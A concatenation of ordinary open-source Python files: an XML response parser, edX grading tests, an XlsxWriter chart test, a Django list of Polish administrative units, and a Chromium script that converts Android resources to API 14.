specific response elements within an item"""
def __init__(self, connection=None, nodename=None):
"""Initialize this Item"""
self._connection = connection
self._nodename = nodename
self._nodepath = []
self._curobj = None
self._xml = StringIO()
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.__dict__)
#
# Attribute Functions
#
def get(self, name):
return self.__dict__.get(name)
def set(self, name, value):
self.__dict__[name] = value
def to_xml(self):
return "<%s>%s</%s>" % (self._nodename, self._xml.getvalue(), self._nodename)
#
# XML Parser functions
#
def startElement(self, name, attrs, connection):
self._xml.write("<%s>" % name)
self._nodepath.append(name)
if len(self._nodepath) == 1:
obj = ResponseGroup(self._connection)
self.set(name, obj)
self._curobj = obj
elif self._curobj:
self._curobj.startElement(name, attrs, connection)
return None
def endElement(self, name, value, connection):
self._xml.write("%s</%s>" % (cgi.escape(value).replace("&amp;", "&"), name))
if len(self._nodepath) == 0:
return
obj = None
curval = self.get(name)
if len(self._nodepath) == 1:
if value or not curval:
self.set(name, value)
if self._curobj:
self._curobj = None
#elif len(self._nodepath) == 2:
#self._curobj = None
elif self._curobj:
self._curobj.endElement(name, value, connection)
self._nodepath.pop()
return None
class Item(ResponseGroup):
"""A single Item"""
def __init__(self, connection=None):
"""Initialize this Item"""
ResponseGroup.__init__(self, connection, "Item")
class ItemSet(ResponseGroup):
"""A special ResponseGroup that has built-in paging, and
only creates new Items on the "Item" tag"""
def __init__(self, connection, action, params, page=0):
ResponseGroup.__init__(self, connection, "Items")
self.objs = []
self.iter = None
self.page = page
self.action = action
self.params = params
self.curItem = None
self.total_results = 0
self.total_pages = 0
def startElement(self, name, attrs, connection):
if name == "Item":
self.curItem = Item(self._connection)
elif self.curItem != None:
self.curItem.startElement(name, attrs, connection)
return None
def endElement(self, name, value, connection):
if name == 'TotalResults':
self.total_results = value
elif name == 'TotalPages':
self.total_pages = value
elif name == "Item":
self.objs.append(self.curItem)
self._xml.write(self.curItem.to_xml())
self.curItem = None
elif self.curItem != None:
self.curItem.endElement(name, value, connection)
return None
def next(self):
"""Special paging functionality"""
if self.iter == None:
self.iter = iter(self.objs)
try:
return self.iter.next()
except StopIteration:
self.iter = None
self.objs = []
if int(self.page) < int(self.total_pages):
self.page += 1
self._connection.get_response(self.action, self.params, self.page, self)
return self.next()
else:
raise
def __iter__(self):
return self
def to_xml(self):
"""Override to first fetch everything"""
for item in self:
pass
return ResponseGroup.to_xml(self)
| bsd-3-clause |
morpheby/levelup-by | lms/djangoapps/open_ended_grading/tests.py | 2 | 13802 | """
Tests for open ended grading interfaces
./manage.py lms --settings test test lms/djangoapps/open_ended_grading
"""
import json
from mock import MagicMock, patch, Mock
from django.core.urlresolvers import reverse
from django.contrib.auth.models import Group, User
from django.conf import settings
from mitxmako.shortcuts import render_to_string
from xmodule.open_ended_grading_classes import peer_grading_service, controller_query_service
from xmodule import peer_grading_module
from xmodule.modulestore.django import modulestore
from xmodule.x_module import ModuleSystem
from xblock.fields import ScopeIds
from open_ended_grading import staff_grading_service, views
from courseware.access import _course_staff_group_name
import logging
log = logging.getLogger(__name__)
from django.test.utils import override_settings
from xmodule.tests import test_util_open_ended
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xblock.field_data import DictFieldData
from courseware.tests import factories
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from courseware.tests.helpers import LoginEnrollmentTestCase, check_for_get_code, check_for_post_code
class EmptyStaffGradingService(object):
"""
A staff grading service that does not return a problem list from get_problem_list.
Used for testing to see if error message for empty problem list is correctly displayed.
"""
def get_problem_list(self, course_id, user_id):
"""
Return a staff grading response that is missing a problem list key.
"""
return json.dumps({'success': True, 'error': 'No problems found.'})
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestStaffGradingService(ModuleStoreTestCase, LoginEnrollmentTestCase):
'''
Check that staff grading service proxy works. Basically just checking the
access control and error handling logic -- all the actual work is on the
backend.
'''
def setUp(self):
self.student = 'view@test.com'
self.instructor = 'view2@test.com'
self.password = 'foo'
self.location = 'TestLocation'
self.create_account('u1', self.student, self.password)
self.create_account('u2', self.instructor, self.password)
self.activate_user(self.student)
self.activate_user(self.instructor)
self.course_id = "edX/toy/2012_Fall"
self.toy = modulestore().get_course(self.course_id)
def make_instructor(course):
group_name = _course_staff_group_name(course.location)
group = Group.objects.create(name=group_name)
group.user_set.add(User.objects.get(email=self.instructor))
make_instructor(self.toy)
self.mock_service = staff_grading_service.staff_grading_service()
self.logout()
def test_access(self):
"""
Make sure only staff have access.
"""
self.login(self.student, self.password)
# both get and post should return 404
for view_name in ('staff_grading_get_next', 'staff_grading_save_grade'):
url = reverse(view_name, kwargs={'course_id': self.course_id})
check_for_get_code(self, 404, url)
check_for_post_code(self, 404, url)
def test_get_next(self):
self.login(self.instructor, self.password)
url = reverse('staff_grading_get_next', kwargs={'course_id': self.course_id})
data = {'location': self.location}
response = check_for_post_code(self, 200, url, data)
content = json.loads(response.content)
self.assertTrue(content['success'])
self.assertEquals(content['submission_id'], self.mock_service.cnt)
self.assertIsNotNone(content['submission'])
self.assertIsNotNone(content['num_graded'])
self.assertIsNotNone(content['min_for_ml'])
self.assertIsNotNone(content['num_pending'])
self.assertIsNotNone(content['prompt'])
self.assertIsNotNone(content['ml_error_info'])
self.assertIsNotNone(content['max_score'])
self.assertIsNotNone(content['rubric'])
def save_grade_base(self, skip=False):
self.login(self.instructor, self.password)
url = reverse('staff_grading_save_grade', kwargs={'course_id': self.course_id})
data = {'score': '12',
'feedback': 'great!',
'submission_id': '123',
'location': self.location,
'submission_flagged': "true",
'rubric_scores[]': ['1', '2']}
if skip:
data.update({'skipped': True})
response = check_for_post_code(self, 200, url, data)
content = json.loads(response.content)
self.assertTrue(content['success'], str(content))
self.assertEquals(content['submission_id'], self.mock_service.cnt)
def test_save_grade(self):
self.save_grade_base(skip=False)
def test_save_grade_skip(self):
self.save_grade_base(skip=True)
def test_get_problem_list(self):
self.login(self.instructor, self.password)
url = reverse('staff_grading_get_problem_list', kwargs={'course_id': self.course_id})
data = {}
response = check_for_post_code(self, 200, url, data)
content = json.loads(response.content)
self.assertTrue(content['success'])
self.assertEqual(content['problem_list'], [])
@patch('open_ended_grading.staff_grading_service._service', EmptyStaffGradingService())
def test_get_problem_list_missing(self):
"""
Test to see if a staff grading response missing a problem list is given the appropriate error.
Mock the staff grading service to enable the key to be missing.
"""
# Get a valid user object.
instructor = User.objects.get(email=self.instructor)
# Mock a request object.
request = Mock(
user=instructor,
)
# Get the response and load its content.
response = json.loads(staff_grading_service.get_problem_list(request, self.course_id).content)
# A valid response will have an "error" key.
self.assertTrue('error' in response)
# Check that the error text is correct.
self.assertIn("Cannot find", response['error'])
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestPeerGradingService(ModuleStoreTestCase, LoginEnrollmentTestCase):
'''
Check that staff grading service proxy works. Basically just checking the
access control and error handling logic -- all the actual work is on the
backend.
'''
def setUp(self):
self.student = 'view@test.com'
self.instructor = 'view2@test.com'
self.password = 'foo'
self.location = 'TestLocation'
self.create_account('u1', self.student, self.password)
self.create_account('u2', self.instructor, self.password)
self.activate_user(self.student)
self.activate_user(self.instructor)
self.course_id = "edX/toy/2012_Fall"
self.toy = modulestore().get_course(self.course_id)
location = "i4x://edX/toy/peergrading/init"
field_data = DictFieldData({'data': "<peergrading/>", 'location': location, 'category':'peergrading'})
self.mock_service = peer_grading_service.MockPeerGradingService()
self.system = ModuleSystem(
ajax_url=location,
track_function=None,
get_module=None,
render_template=render_to_string,
replace_urls=None,
xmodule_field_data=lambda d: d._field_data,
s3_interface=test_util_open_ended.S3_INTERFACE,
open_ended_grading_interface=test_util_open_ended.OPEN_ENDED_GRADING_INTERFACE,
mixins=settings.XBLOCK_MIXINS,
)
self.descriptor = peer_grading_module.PeerGradingDescriptor(self.system, field_data, ScopeIds(None, None, None, None))
self.peer_module = self.descriptor.xmodule(self.system)
self.peer_module.peer_gs = self.mock_service
self.logout()
def test_get_next_submission_success(self):
data = {'location': self.location}
response = self.peer_module.get_next_submission(data)
content = response
self.assertTrue(content['success'])
self.assertIsNotNone(content['submission_id'])
self.assertIsNotNone(content['prompt'])
self.assertIsNotNone(content['submission_key'])
self.assertIsNotNone(content['max_score'])
def test_get_next_submission_missing_location(self):
data = {}
d = self.peer_module.get_next_submission(data)
self.assertFalse(d['success'])
self.assertEqual(d['error'], "Missing required keys: location")
def test_save_grade_success(self):
data = {
'rubric_scores[]': [0, 0],
'location': self.location,
'submission_id': 1,
'submission_key': 'fake key',
'score': 2,
'feedback': 'feedback',
'submission_flagged': 'false',
'answer_unknown': 'false',
'rubric_scores_complete' : 'true'
}
qdict = MagicMock()
def fake_get_item(key):
return data[key]
qdict.__getitem__.side_effect = fake_get_item
qdict.getlist = fake_get_item
qdict.keys = data.keys
response = self.peer_module.save_grade(qdict)
self.assertTrue(response['success'])
def test_save_grade_missing_keys(self):
data = {}
d = self.peer_module.save_grade(data)
self.assertFalse(d['success'])
self.assertTrue(d['error'].find('Missing required keys:') > -1)
def test_is_calibrated_success(self):
data = {'location': self.location}
response = self.peer_module.is_student_calibrated(data)
self.assertTrue(response['success'])
self.assertTrue('calibrated' in response)
def test_is_calibrated_failure(self):
data = {}
response = self.peer_module.is_student_calibrated(data)
self.assertFalse(response['success'])
self.assertFalse('calibrated' in response)
def test_show_calibration_essay_success(self):
data = {'location': self.location}
response = self.peer_module.show_calibration_essay(data)
self.assertTrue(response['success'])
self.assertIsNotNone(response['submission_id'])
self.assertIsNotNone(response['prompt'])
self.assertIsNotNone(response['submission_key'])
self.assertIsNotNone(response['max_score'])
def test_show_calibration_essay_missing_key(self):
data = {}
response = self.peer_module.show_calibration_essay(data)
self.assertFalse(response['success'])
self.assertEqual(response['error'], "Missing required keys: location")
def test_save_calibration_essay_success(self):
data = {
'rubric_scores[]': [0, 0],
'location': self.location,
'submission_id': 1,
'submission_key': 'fake key',
'score': 2,
'feedback': 'feedback',
'submission_flagged': 'false'
}
qdict = MagicMock()
def fake_get_item(key):
return data[key]
qdict.__getitem__.side_effect = fake_get_item
qdict.getlist = fake_get_item
qdict.keys = data.keys
response = self.peer_module.save_calibration_essay(qdict)
self.assertTrue(response['success'])
self.assertTrue('actual_score' in response)
def test_save_calibration_essay_missing_keys(self):
data = {}
response = self.peer_module.save_calibration_essay(data)
self.assertFalse(response['success'])
self.assertTrue(response['error'].find('Missing required keys:') > -1)
self.assertFalse('actual_score' in response)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestPanel(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Run tests on the open ended panel
"""
def setUp(self):
# Toy courses should be loaded
self.course_name = 'edX/open_ended/2012_Fall'
self.course = modulestore().get_course(self.course_name)
self.user = factories.UserFactory()
def test_open_ended_panel(self):
"""
Test to see if the peer grading module in the demo course is found
@return:
"""
found_module, peer_grading_module = views.find_peer_grading_module(self.course)
self.assertTrue(found_module)
@patch('open_ended_grading.views.controller_qs', controller_query_service.MockControllerQueryService(settings.OPEN_ENDED_GRADING_INTERFACE, views.system))
def test_problem_list(self):
"""
Ensure that the problem list from the grading controller server can be rendered properly locally
@return:
"""
request = Mock(user=self.user)
response = views.student_problem_list(request, self.course.id)
self.assertRegexpMatches(response.content, "Here are a list of open ended problems for this course.")
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestPeerGradingFound(ModuleStoreTestCase):
"""
Test to see if peer grading modules can be found properly.
"""
def setUp(self):
self.course_name = 'edX/open_ended_nopath/2012_Fall'
self.course = modulestore().get_course(self.course_name)
def test_peer_grading_nopath(self):
"""
The open_ended_nopath course contains a peer grading module with no path to it.
Ensure that the exception is caught.
"""
found, url = views.find_peer_grading_module(self.course)
self.assertEqual(found, False) | agpl-3.0 |
jvrsantacruz/XlsxWriter | xlsxwriter/test/comparison/test_chart_area04.py | 8 | 1523 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_area04.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {'xl/workbook.xml': ['<fileVersion', '<calcPr']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'area'})
chart.axis_ids = [63591168, 63592704]
chart.axis2_ids = [74921856, 73764224]
data = [
[1, 2, 3, 4, 5],
[6, 8, 6, 4, 2],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5', 'y2_axis': 1})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| bsd-2-clause |
pwong-mapr/private-hue | desktop/core/ext-py/Django-1.4.5/django/contrib/localflavor/pl/pl_administrativeunits.py | 433 | 13194 | # -*- coding: utf-8 -*-
"""
Polish administrative units as in http://pl.wikipedia.org/wiki/Podzia%C5%82_administracyjny_Polski
"""
ADMINISTRATIVE_UNIT_CHOICES = (
('wroclaw', u'Wrocław'),
('jeleniagora', u'Jelenia Góra'),
('legnica', u'Legnica'),
('boleslawiecki', u'bolesławiecki'),
('dzierzoniowski', u'dzierżoniowski'),
('glogowski', u'głogowski'),
('gorowski', u'górowski'),
('jaworski', u'jaworski'),
('jeleniogorski', u'jeleniogórski'),
('kamiennogorski', u'kamiennogórski'),
('klodzki', u'kłodzki'),
('legnicki', u'legnicki'),
('lubanski', u'lubański'),
('lubinski', u'lubiński'),
('lwowecki', u'lwówecki'),
('milicki', u'milicki'),
('olesnicki', u'oleśnicki'),
('olawski', u'oławski'),
('polkowicki', u'polkowicki'),
('strzelinski', u'strzeliński'),
('sredzki', u'średzki'),
('swidnicki', u'świdnicki'),
('trzebnicki', u'trzebnicki'),
('walbrzyski', u'wałbrzyski'),
('wolowski', u'wołowski'),
('wroclawski', u'wrocławski'),
('zabkowicki', u'ząbkowicki'),
('zgorzelecki', u'zgorzelecki'),
('zlotoryjski', u'złotoryjski'),
('bydgoszcz', u'Bydgoszcz'),
('torun', u'Toruń'),
('wloclawek', u'Włocławek'),
('grudziadz', u'Grudziądz'),
('aleksandrowski', u'aleksandrowski'),
('brodnicki', u'brodnicki'),
('bydgoski', u'bydgoski'),
('chelminski', u'chełmiński'),
('golubsko-dobrzynski', u'golubsko-dobrzyński'),
('grudziadzki', u'grudziądzki'),
('inowroclawski', u'inowrocławski'),
('lipnowski', u'lipnowski'),
('mogilenski', u'mogileński'),
('nakielski', u'nakielski'),
('radziejowski', u'radziejowski'),
('rypinski', u'rypiński'),
('sepolenski', u'sępoleński'),
('swiecki', u'świecki'),
('torunski', u'toruński'),
('tucholski', u'tucholski'),
('wabrzeski', u'wąbrzeski'),
('wloclawski', u'wrocławski'),
('zninski', u'źniński'),
('lublin', u'Lublin'),
('biala-podlaska', u'Biała Podlaska'),
('chelm', u'Chełm'),
('zamosc', u'Zamość'),
('bialski', u'bialski'),
('bilgorajski', u'biłgorajski'),
('chelmski', u'chełmski'),
('hrubieszowski', u'hrubieszowski'),
('janowski', u'janowski'),
('krasnostawski', u'krasnostawski'),
('krasnicki', u'kraśnicki'),
('lubartowski', u'lubartowski'),
('lubelski', u'lubelski'),
('leczynski', u'łęczyński'),
('lukowski', u'łukowski'),
('opolski', u'opolski'),
('parczewski', u'parczewski'),
('pulawski', u'puławski'),
('radzynski', u'radzyński'),
('rycki', u'rycki'),
('swidnicki', u'świdnicki'),
('tomaszowski', u'tomaszowski'),
('wlodawski', u'włodawski'),
('zamojski', u'zamojski'),
('gorzow-wielkopolski', u'Gorzów Wielkopolski'),
('zielona-gora', u'Zielona Góra'),
('gorzowski', u'gorzowski'),
('krosnienski', u'krośnieński'),
('miedzyrzecki', u'międzyrzecki'),
('nowosolski', u'nowosolski'),
('slubicki', u'słubicki'),
('strzelecko-drezdenecki', u'strzelecko-drezdenecki'),
('sulecinski', u'suleńciński'),
('swiebodzinski', u'świebodziński'),
('wschowski', u'wschowski'),
('zielonogorski', u'zielonogórski'),
('zaganski', u'żagański'),
('zarski', u'żarski'),
('lodz', u'Łódź'),
('piotrkow-trybunalski', u'Piotrków Trybunalski'),
('skierniewice', u'Skierniewice'),
('belchatowski', u'bełchatowski'),
('brzezinski', u'brzeziński'),
('kutnowski', u'kutnowski'),
('laski', u'łaski'),
('leczycki', u'łęczycki'),
('lowicki', u'łowicki'),
('lodzki wschodni', u'łódzki wschodni'),
('opoczynski', u'opoczyński'),
('pabianicki', u'pabianicki'),
('pajeczanski', u'pajęczański'),
('piotrkowski', u'piotrkowski'),
('poddebicki', u'poddębicki'),
('radomszczanski', u'radomszczański'),
('rawski', u'rawski'),
('sieradzki', u'sieradzki'),
('skierniewicki', u'skierniewicki'),
('tomaszowski', u'tomaszowski'),
('wielunski', u'wieluński'),
('wieruszowski', u'wieruszowski'),
('zdunskowolski', u'zduńskowolski'),
('zgierski', u'zgierski'),
('krakow', u'Kraków'),
('tarnow', u'Tarnów'),
('nowy-sacz', u'Nowy Sącz'),
('bochenski', u'bocheński'),
('brzeski', u'brzeski'),
('chrzanowski', u'chrzanowski'),
('dabrowski', u'dąbrowski'),
('gorlicki', u'gorlicki'),
('krakowski', u'krakowski'),
('limanowski', u'limanowski'),
('miechowski', u'miechowski'),
('myslenicki', u'myślenicki'),
('nowosadecki', u'nowosądecki'),
('nowotarski', u'nowotarski'),
('olkuski', u'olkuski'),
('oswiecimski', u'oświęcimski'),
('proszowicki', u'proszowicki'),
('suski', u'suski'),
('tarnowski', u'tarnowski'),
('tatrzanski', u'tatrzański'),
('wadowicki', u'wadowicki'),
('wielicki', u'wielicki'),
('warszawa', u'Warszawa'),
('ostroleka', u'Ostrołęka'),
('plock', u'Płock'),
('radom', u'Radom'),
('siedlce', u'Siedlce'),
('bialobrzeski', u'białobrzeski'),
('ciechanowski', u'ciechanowski'),
('garwolinski', u'garwoliński'),
('gostyninski', u'gostyniński'),
('grodziski', u'grodziski'),
('grojecki', u'grójecki'),
('kozienicki', u'kozenicki'),
('legionowski', u'legionowski'),
('lipski', u'lipski'),
('losicki', u'łosicki'),
('makowski', u'makowski'),
('minski', u'miński'),
('mlawski', u'mławski'),
('nowodworski', u'nowodworski'),
('ostrolecki', u'ostrołęcki'),
('ostrowski', u'ostrowski'),
('otwocki', u'otwocki'),
('piaseczynski', u'piaseczyński'),
('plocki', u'płocki'),
('plonski', u'płoński'),
('pruszkowski', u'pruszkowski'),
('przasnyski', u'przasnyski'),
('przysuski', u'przysuski'),
('pultuski', u'pułtuski'),
('radomski', u'radomski'),
('siedlecki', u'siedlecki'),
('sierpecki', u'sierpecki'),
('sochaczewski', u'sochaczewski'),
('sokolowski', u'sokołowski'),
('szydlowiecki', u'szydłowiecki'),
('warszawski-zachodni', u'warszawski zachodni'),
('wegrowski', u'węgrowski'),
('wolominski', u'wołomiński'),
('wyszkowski', u'wyszkowski'),
('zwolenski', u'zwoleński'),
('zurominski', u'żuromiński'),
('zyrardowski', u'żyrardowski'),
('opole', u'Opole'),
('brzeski', u'brzeski'),
('glubczycki', u'głubczyski'),
('kedzierzynsko-kozielski', u'kędzierzyński-kozielski'),
('kluczborski', u'kluczborski'),
('krapkowicki', u'krapkowicki'),
('namyslowski', u'namysłowski'),
('nyski', u'nyski'),
('oleski', u'oleski'),
('opolski', u'opolski'),
('prudnicki', u'prudnicki'),
('strzelecki', u'strzelecki'),
('rzeszow', u'Rzeszów'),
('krosno', u'Krosno'),
('przemysl', u'Przemyśl'),
('tarnobrzeg', u'Tarnobrzeg'),
('bieszczadzki', u'bieszczadzki'),
('brzozowski', u'brzozowski'),
('debicki', u'dębicki'),
('jaroslawski', u'jarosławski'),
('jasielski', u'jasielski'),
('kolbuszowski', u'kolbuszowski'),
('krosnienski', u'krośnieński'),
('leski', u'leski'),
('lezajski', u'leżajski'),
('lubaczowski', u'lubaczowski'),
('lancucki', u'łańcucki'),
('mielecki', u'mielecki'),
('nizanski', u'niżański'),
('przemyski', u'przemyski'),
('przeworski', u'przeworski'),
('ropczycko-sedziszowski', u'ropczycko-sędziszowski'),
('rzeszowski', u'rzeszowski'),
('sanocki', u'sanocki'),
('stalowowolski', u'stalowowolski'),
('strzyzowski', u'strzyżowski'),
('tarnobrzeski', u'tarnobrzeski'),
('bialystok', u'Białystok'),
('lomza', u'Łomża'),
('suwalki', u'Suwałki'),
('augustowski', u'augustowski'),
('bialostocki', u'białostocki'),
('bielski', u'bielski'),
('grajewski', u'grajewski'),
('hajnowski', u'hajnowski'),
('kolnenski', u'kolneński'),
('łomzynski', u'łomżyński'),
('moniecki', u'moniecki'),
('sejnenski', u'sejneński'),
('siemiatycki', u'siematycki'),
('sokolski', u'sokólski'),
('suwalski', u'suwalski'),
('wysokomazowiecki', u'wysokomazowiecki'),
('zambrowski', u'zambrowski'),
('gdansk', u'Gdańsk'),
('gdynia', u'Gdynia'),
('slupsk', u'Słupsk'),
('sopot', u'Sopot'),
('bytowski', u'bytowski'),
('chojnicki', u'chojnicki'),
('czluchowski', u'człuchowski'),
('kartuski', u'kartuski'),
('koscierski', u'kościerski'),
('kwidzynski', u'kwidzyński'),
('leborski', u'lęborski'),
('malborski', u'malborski'),
('nowodworski', u'nowodworski'),
('gdanski', u'gdański'),
('pucki', u'pucki'),
('slupski', u'słupski'),
('starogardzki', u'starogardzki'),
('sztumski', u'sztumski'),
('tczewski', u'tczewski'),
('wejherowski', u'wejcherowski'),
('katowice', u'Katowice'),
('bielsko-biala', u'Bielsko-Biała'),
('bytom', u'Bytom'),
('chorzow', u'Chorzów'),
('czestochowa', u'Częstochowa'),
('dabrowa-gornicza', u'Dąbrowa Górnicza'),
('gliwice', u'Gliwice'),
('jastrzebie-zdroj', u'Jastrzębie Zdrój'),
('jaworzno', u'Jaworzno'),
('myslowice', u'Mysłowice'),
('piekary-slaskie', u'Piekary Śląskie'),
('ruda-slaska', u'Ruda Śląska'),
('rybnik', u'Rybnik'),
('siemianowice-slaskie', u'Siemianowice Śląskie'),
('sosnowiec', u'Sosnowiec'),
('swietochlowice', u'Świętochłowice'),
('tychy', u'Tychy'),
('zabrze', u'Zabrze'),
('zory', u'Żory'),
('bedzinski', u'będziński'),
('bielski', u'bielski'),
('bierunsko-ledzinski', u'bieruńsko-lędziński'),
('cieszynski', u'cieszyński'),
('czestochowski', u'częstochowski'),
('gliwicki', u'gliwicki'),
('klobucki', u'kłobucki'),
('lubliniecki', u'lubliniecki'),
('mikolowski', u'mikołowski'),
('myszkowski', u'myszkowski'),
('pszczynski', u'pszczyński'),
('raciborski', u'raciborski'),
('rybnicki', u'rybnicki'),
('tarnogorski', u'tarnogórski'),
('wodzislawski', u'wodzisławski'),
('zawiercianski', u'zawierciański'),
('zywiecki', u'żywiecki'),
('kielce', u'Kielce'),
('buski', u'buski'),
('jedrzejowski', u'jędrzejowski'),
('kazimierski', u'kazimierski'),
('kielecki', u'kielecki'),
('konecki', u'konecki'),
('opatowski', u'opatowski'),
('ostrowiecki', u'ostrowiecki'),
('pinczowski', u'pińczowski'),
('sandomierski', u'sandomierski'),
('skarzyski', u'skarżyski'),
('starachowicki', u'starachowicki'),
('staszowski', u'staszowski'),
('wloszczowski', u'włoszczowski'),
('olsztyn', u'Olsztyn'),
('elblag', u'Elbląg'),
('bartoszycki', u'bartoszycki'),
('braniewski', u'braniewski'),
('dzialdowski', u'działdowski'),
('elblaski', u'elbląski'),
('elcki', u'ełcki'),
('gizycki', u'giżycki'),
('goldapski', u'gołdapski'),
('ilawski', u'iławski'),
('ketrzynski', u'kętrzyński'),
('lidzbarski', u'lidzbarski'),
('mragowski', u'mrągowski'),
('nidzicki', u'nidzicki'),
('nowomiejski', u'nowomiejski'),
('olecki', u'olecki'),
('olsztynski', u'olsztyński'),
('ostrodzki', u'ostródzki'),
('piski', u'piski'),
('szczycienski', u'szczycieński'),
('wegorzewski', u'węgorzewski'),
('poznan', u'Poznań'),
('kalisz', u'Kalisz'),
('konin', u'Konin'),
('leszno', u'Leszno'),
('chodzieski', u'chodziejski'),
('czarnkowsko-trzcianecki', u'czarnkowsko-trzcianecki'),
('gnieznienski', u'gnieźnieński'),
('gostynski', u'gostyński'),
('grodziski', u'grodziski'),
('jarocinski', u'jarociński'),
('kaliski', u'kaliski'),
('kepinski', u'kępiński'),
('kolski', u'kolski'),
('koninski', u'koniński'),
('koscianski', u'kościański'),
('krotoszynski', u'krotoszyński'),
('leszczynski', u'leszczyński'),
('miedzychodzki', u'międzychodzki'),
('nowotomyski', u'nowotomyski'),
('obornicki', u'obornicki'),
('ostrowski', u'ostrowski'),
('ostrzeszowski', u'ostrzeszowski'),
('pilski', u'pilski'),
('pleszewski', u'pleszewski'),
('poznanski', u'poznański'),
('rawicki', u'rawicki'),
('slupecki', u'słupecki'),
('szamotulski', u'szamotulski'),
('sredzki', u'średzki'),
('sremski', u'śremski'),
('turecki', u'turecki'),
('wagrowiecki', u'wągrowiecki'),
('wolsztynski', u'wolsztyński'),
('wrzesinski', u'wrzesiński'),
('zlotowski', u'złotowski'),
('bialogardzki', u'białogardzki'),
('choszczenski', u'choszczeński'),
('drawski', u'drawski'),
('goleniowski', u'goleniowski'),
('gryficki', u'gryficki'),
('gryfinski', u'gryfiński'),
('kamienski', u'kamieński'),
('kolobrzeski', u'kołobrzeski'),
('koszalinski', u'koszaliński'),
('lobeski', u'łobeski'),
('mysliborski', u'myśliborski'),
('policki', u'policki'),
('pyrzycki', u'pyrzycki'),
('slawienski', u'sławieński'),
('stargardzki', u'stargardzki'),
('szczecinecki', u'szczecinecki'),
('swidwinski', u'świdwiński'),
('walecki', u'wałecki'),
)
| apache-2.0 |
boundarydevices/android_external_chromium_org | build/android/gyp/generate_v14_compatible_resources.py | 14 | 13731 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Convert Android xml resources to API 14 compatible.
There are two reasons that we cannot just use API 17 attributes,
so we are generating another set of resources by this script.
1. paddingStart attribute can cause a crash on Galaxy Tab 2.
2. There is a bug that paddingStart does not override paddingLeft on
JB-MR1. This is fixed on JB-MR2.
Therefore, this resource generation script can be removed when
we drop the support for JB-MR1.
Please refer to http://crbug.com/235118 for the details.
"""
import optparse
import os
import re
import shutil
import sys
import xml.dom.minidom as minidom
from util import build_utils
# Note that we are assuming 'android:' is an alias of
# the namespace 'http://schemas.android.com/apk/res/android'.
GRAVITY_ATTRIBUTES = ('android:gravity', 'android:layout_gravity')
# Almost all the attributes that has "Start" or "End" in
# its name should be mapped.
ATTRIBUTES_TO_MAP = {'paddingStart' : 'paddingLeft',
'drawableStart' : 'drawableLeft',
'layout_alignStart' : 'layout_alignLeft',
'layout_marginStart' : 'layout_marginLeft',
'layout_alignParentStart' : 'layout_alignParentLeft',
'layout_toStartOf' : 'layout_toLeftOf',
'paddingEnd' : 'paddingRight',
'drawableEnd' : 'drawableRight',
'layout_alignEnd' : 'layout_alignRight',
'layout_marginEnd' : 'layout_marginRight',
'layout_alignParentEnd' : 'layout_alignParentRight',
'layout_toEndOf' : 'layout_toRightOf'}
ATTRIBUTES_TO_MAP = dict(['android:' + k, 'android:' + v] for k, v
in ATTRIBUTES_TO_MAP.iteritems())
ATTRIBUTES_TO_MAP_REVERSED = dict([v, k] for k, v
in ATTRIBUTES_TO_MAP.iteritems())
def IterateXmlElements(node):
"""minidom helper function that iterates all the element nodes.
Iteration order is pre-order depth-first."""
if node.nodeType == node.ELEMENT_NODE:
yield node
for child_node in node.childNodes:
for child_node_element in IterateXmlElements(child_node):
yield child_node_element
def AssertNotDeprecatedAttribute(name, value, filename):
"""Raises an exception if the given attribute is deprecated."""
msg = None
if name in ATTRIBUTES_TO_MAP_REVERSED:
msg = '{0} should use {1} instead of {2}'.format(filename,
ATTRIBUTES_TO_MAP_REVERSED[name], name)
elif name in GRAVITY_ATTRIBUTES and ('left' in value or 'right' in value):
msg = '{0} should use start/end instead of left/right for {1}'.format(
filename, name)
if msg:
msg += ('\nFor background, see: http://android-developers.blogspot.com/'
'2013/03/native-rtl-support-in-android-42.html\n'
'If you have a legitimate need for this attribute, discuss with '
'kkimlabs@chromium.org or newt@chromium.org')
raise Exception(msg)
def WriteDomToFile(dom, filename):
"""Write the given dom to filename."""
build_utils.MakeDirectory(os.path.dirname(filename))
with open(filename, 'w') as f:
dom.writexml(f, '', ' ', '\n', encoding='utf-8')
def HasStyleResource(dom):
"""Return True if the dom is a style resource, False otherwise."""
root_node = IterateXmlElements(dom).next()
return bool(root_node.nodeName == 'resources' and
list(root_node.getElementsByTagName('style')))
def ErrorIfStyleResourceExistsInDir(input_dir):
"""If a style resource is in input_dir, raises an exception."""
for input_filename in build_utils.FindInDirectory(input_dir, '*.xml'):
dom = minidom.parse(input_filename)
if HasStyleResource(dom):
raise Exception('error: style file ' + input_filename +
' should be under ' + input_dir +
'-v17 directory. Please refer to '
'http://crbug.com/243952 for the details.')
def GenerateV14LayoutResourceDom(dom, filename, assert_not_deprecated=True):
"""Convert layout resource to API 14 compatible layout resource.
Args:
dom: Parsed minidom object to be modified.
filename: Filename that the DOM was parsed from.
assert_not_deprecated: Whether deprecated attributes (e.g. paddingLeft) will
cause an exception to be thrown.
Returns:
True if dom is modified, False otherwise.
"""
